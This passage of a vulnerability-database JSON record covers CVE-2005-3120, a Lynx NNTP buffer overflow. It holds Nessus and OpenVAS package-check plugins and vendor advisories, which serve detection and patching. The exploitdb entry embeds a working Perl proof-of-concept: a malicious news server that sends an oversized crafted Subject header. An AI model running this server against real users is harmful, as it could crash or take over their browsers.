"debian"}, {"idList": ["CESA-2005:803", "CESA-2005:803-01"], "type": "centos"}, {"idList": ["OSVDB:20019"], "type": "osvdb"}, {"idList": ["USN-206-1"], "type": "ubuntu"}, {"idList": ["RHSA-2005:803"], "type": "redhat"}, {"idList": ["CVE-2005-3120"], "type": "cve"}, {"idList": ["EDB-ID:1256"], "type": "exploitdb"}, {"idList": ["SSA-2005-310-03"], "type": "slackware"}, {"idList": ["FEDORA_2005-994.NASL", "MANDRAKE_MDKSA-2005-186.NASL", "REDHAT-RHSA-2005-803.NASL", "UBUNTU_USN-206-1.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "DEBIAN_DSA-876.NASL", "CENTOS_RHSA-2005-803.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-874.NASL", "SLACKWARE_SSA_2005-310-03.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:55752", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:56855", "OPENVAS:136141256231055806", "OPENVAS:55658", "OPENVAS:55750"], "type": "openvas"}, {"idList": ["C01170BF-4990-11DA-A1B8-000854D03344"], "type": "freebsd"}]}, "score": {"modified": "2019-11-01T02:40:14", "value": 7.0, "vector": "NONE"}}, "hash": "5d3140fff159ed78cc232767bcaf884345f6e090edf065a18d6b45d7f83944b1", "hashmap": [{"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "8e15c6b081241240f6a69d63bdc75473", "key": "description"}, {"hash": "2ec58e3149bbfdca87c6474a76a01482", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "f5bbe8a2cc6600991512b750e4790ba4", "key": "sourceData"}, {"hash": "507c1dcbb71af7a074b2f9898d9bcebb", "key": "reporter"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2019-11-01T02:40:14", "modified": "2019-11-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["modified"], "edition": 9, "lastseen": "2019-11-01T02:40:14"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "f429a669c6d1aa0a5d15de3e2ff62660"}, {"key": "cvelist", "hash": "eab4d37c93551297e871c7fde674c1d5"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "8e15c6b081241240f6a69d63bdc75473"}, {"key": "href", "hash": "2ec58e3149bbfdca87c6474a76a01482"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "2fe4b13d9f35cdcf8083d1525b42c81c"}, {"key": "published", "hash": "ca4f114e818b5dc0a40189d888cb0bec"}, {"key": "references", "hash": "961c51238ce339633b9f217e84eeb79e"}, {"key": "reporter", "hash": "507c1dcbb71af7a074b2f9898d9bcebb"}, {"key": "sourceData", "hash": "f5bbe8a2cc6600991512b750e4790ba4"}, {"key": "title", "hash": "725c91aa283ab77092d2e53606ccb0f8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "10a7d6e5e71b4bd01250cb0f745bea65fcadea950c2cbcd1e65f29ba6240b27b", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3120"]}, {"type": "redhat", "idList": ["RHSA-2005:803"]}, {"type": "centos", "idList": ["CESA-2005:803", "CESA-2005:803-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:1256"]}, {"type": "ubuntu", "idList": ["USN-206-1"]}, {"type": "openvas", "idList": ["OPENVAS:55750", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:55752", "OPENVAS:55658", "OPENVAS:136141256231055806", "OPENVAS:56855"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2005-803.NASL", "DEBIAN_DSA-876.NASL", "REDHAT-RHSA-2005-803.NASL", "DEBIAN_DSA-874.NASL", "FEDORA_2005-994.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "UBUNTU_USN-206-1.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-1085.NASL", "MANDRAKE_MDKSA-2005-186.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200510-15"]}, {"type": "slackware", "idList": ["SSA-2005-310-03"]}, {"type": "debian", "idList": ["DEBIAN:DSA-876-1:39741", "DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E"]}, {"type": "freebsd", "idList": ["C01170BF-4990-11DA-A1B8-000854D03344"]}, {"type": "osvdb", "idList": ["OSVDB:20019"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9961"]}], "modified": "2019-12-13T07:33:17"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-12-13T07:33:17"}, "vulnersScore": 7.0}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "20035", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certain article headers containing Asian characters that cause Lynx to add extra escape (ESC) characters.", "modified": "2018-10-19T15:34:00", "id": "CVE-2005-3120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3120", "published": "2005-10-17T20:06:00", "title": "CVE-2005-3120", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:16", "bulletinFamily": "unix", "description": "Lynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.", "modified": "2018-03-14T19:27:14", "published": "2005-10-17T04:00:00", "id": "RHSA-2005:803", "href": "https://access.redhat.com/errata/RHSA-2005:803", "type": "redhat", "title": "(RHSA-2005:803) lynx security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:803\n\n\nLynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012288.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012289.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012292.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012293.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012296.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012297.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012298.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012320.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012321.html\n\n**Affected packages:**\nlynx\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-803.html", "modified": "2005-10-18T18:26:22", "published": "2005-10-17T10:29:06", "href": "http://lists.centos.org/pipermail/centos-announce/2005-October/012288.html", "id": "CESA-2005:803", "title": "lynx security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:803-01\n\n\nLynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012304.html\n\n**Affected packages:**\nlynx\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2005-10-18T04:24:55", "published": "2005-10-18T04:24:55", "href": "http://lists.centos.org/pipermail/centos-announce/2005-October/012304.html", "id": "CESA-2005:803-01", "title": "lynx security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T13:52:22", "bulletinFamily": "exploit", "description": "Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC). CVE-2005-3120. Dos exploits for multiple platform", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "EDB-ID:1256", "href": "https://www.exploit-db.com/exploits/1256/", "type": "exploitdb", "title": "Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit PoC", "sourceData": "#!/usr/bin/perl --\n\n# lynx-nntp-server\n# by Ulf Harnhammar in 2005\n# I hereby place this program in the public domain.\n\nuse strict;\nuse IO::Socket;\n\n$main::port = 119;\n$main::timeout = 5;\n\n# *** SUBROUTINES ***\n\nsub mysend($$)\n{\nmy $file = shift;\nmy $str = shift;\n\nprint $file \"$str\\n\";\nprint \"SENT: $str\\n\";\n} # sub mysend\n\nsub myreceive($)\n{\nmy $file = shift;\nmy $inp;\n\neval\n{\nlocal $SIG{ALRM} = sub { die \"alarm\\n\" };\nalarm $main::timeout;\n$inp = <$file>;\nalarm 0;\n};\n\nif ($@ eq \"alarm\\n\") { $inp = ''; print \"TIMED OUT\\n\"; }\n$inp =~ tr/\\015\\012\\000//d;\nprint \"RECEIVED: $inp\\n\";\n$inp;\n} # sub myreceive\n\n# *** MAIN PROGRAM ***\n\n{\nmy $server = IO::Socket::INET->new( Proto => 'tcp',\nLocalPort => $main::port,\nListen => SOMAXCONN,\nReuse => 1);\ndie \"can't set up server!\\n\" unless $server;\n\n\nwhile (my $client = $server->accept())\n{\n$client->autoflush(1);\nprint 'connection from '.$client->peerhost.\"\\n\";\n\n\nmysend($client, '200 Internet News');\nmy $group = 'alt.angst';\n\nwhile (my $str = myreceive($client))\n{\nif ($str =~ m/^mode reader$/i)\n{\nmysend($client, '200 Internet News');\nnext;\n}\n\nif ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)\n{\n$group = $1;\nmysend($client, \"211 1 1 1 $group\");\nnext;\n}\n\nif ($str =~ m/^quit$/i)\n{\nmysend($client, '205 Goodbye');\nlast;\n}\n\nif ($str =~ m/^head ([0-9]+)$/i)\n{\nmy $evil = '$@UU(JUU' x 21; # Edit the number!\n$evil .= 'U' x (504 - length $evil);\n\nmy $head = <<HERE;\n221 $1 <xyzzy\\@usenet.qx>\nPath: host!someotherhost!onemorehost\nFrom: <mr_talkative\\@usenet.qx>\nSubject: $evil\nNewsgroup: $group\nMessage-ID: <xyzzy\\@usenet.qx>\n.\nHERE\n\n$head =~ s|\\s+$||s;\nmysend($client, $head);\nnext;\n}\n\nmysend($client, '500 Syntax Error');\n} # while str=myreceive(client)\n\nclose $client;\nprint \"closed\\n\\n\\n\";\n} # while client=server->accept()\n}\n\n# milw0rm.com [2005-10-17]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1256/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:29", "bulletinFamily": "unix", "description": "Ulf Harnhammar discovered a remote vulnerability in Lynx when connecting to a news server (NNTP). The function that added missing escape chararacters to article headers did not check the size of the target buffer. Specially crafted news entries could trigger a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user running lynx. In order to exploit this, the user is not even required to actively visit a news site with Lynx since a malicious HTML page could automatically redirect to an nntp:// URL with malicious news items.", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "USN-206-1", "href": "https://usn.ubuntu.com/206-1/", "title": "Lynx vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:49:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx\nannounced via advisory DSA 874-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55750", "id": "OPENVAS:55750", "title": "Debian Security Advisory DSA 874-1 (lynx)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_874_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 874-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20874-1\";\ntag_summary = \"The remote host is missing an update to lynx\nannounced via advisory DSA 874-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\";\n\n\nif(description)\n{\n script_id(55750);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 874-1 (lynx)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lynx\", ver:\"2.8.4.1b-3.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lynx\", ver:\"2.8.5-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-22T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55743", "id": "OPENVAS:55743", "title": "FreeBSD Ports: lynx", "type": "openvas", "sourceData": "#\n#VID c01170bf-4990-11da-a1b8-000854d03344\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: lynx\n\nCVE-2005-3120\nStack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and\nearlier allows remote NNTP servers to execute arbitrary code via\ncertain article headers that cause Lynx to add extra escape (ESC)\ncharacters.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html\nhttp://www.vuxml.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(55743);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(15117);\n script_cve_id(\"CVE-2005-3120\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: lynx\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"lynx\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.8.5_1\")<0) {\n txt += 'Package lynx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.8.6*\")>0 && revcomp(a:bver, b:\"2.8.6d14\")<0) {\n txt += 'Package lynx version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2005-310-03.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55806", "id": "OPENVAS:55806", "title": "Slackware Advisory SSA:2005-310-03 